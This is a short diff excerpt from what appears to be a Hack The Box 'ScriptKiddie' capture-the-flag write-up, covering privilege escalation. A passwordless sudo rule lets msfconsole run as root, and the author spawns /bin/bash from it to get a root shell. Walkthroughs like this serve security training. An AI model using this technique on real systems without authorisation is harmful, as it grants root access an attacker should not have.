Kyuu-Ji/htb-write-up/scriptkiddie/write-up-scriptkiddie.md

     (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
 ```

-Starting the **Metasploit Console**
+Starting the **Metasploit Console**:
 ```
 sudo /opt/metasploit-framework-6.0.9/msfconsole
 ```

-It is possible to execute local commands from `msfconsole` and the privileges will stay:
+It is possible to run local commands from `msfconsole` with the executed privileges:
 ```
 msf6 > /bin/bash
 [*] exec: /bin/bash